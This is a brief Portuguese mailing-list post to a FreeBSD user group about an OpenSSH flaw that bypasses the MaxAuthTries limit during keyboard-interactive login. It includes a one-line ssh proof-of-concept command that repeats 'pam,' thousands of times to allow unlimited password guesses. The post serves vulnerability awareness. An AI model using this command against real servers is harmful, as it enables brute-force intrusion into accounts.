[FUG-BR] OpenSSH Bug no freeBSD

Enrique Fynn enriquefynn em gmail.com
Quinta Julho 23 13:40:05 BRT 2015


https://kingcope.wordpress.com/2015/07/16/openssh-keyboard-interactive-authentication-brute-force-vulnerability-maxauthtries-bypass/

Pra testar, como dito no artigo acima:
ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` hostname

Da pra fazer bem mais das usuáis 3 tentativas erradas de login, com
esse método =/


Mais detalhes sobre a lista de discussão freebsd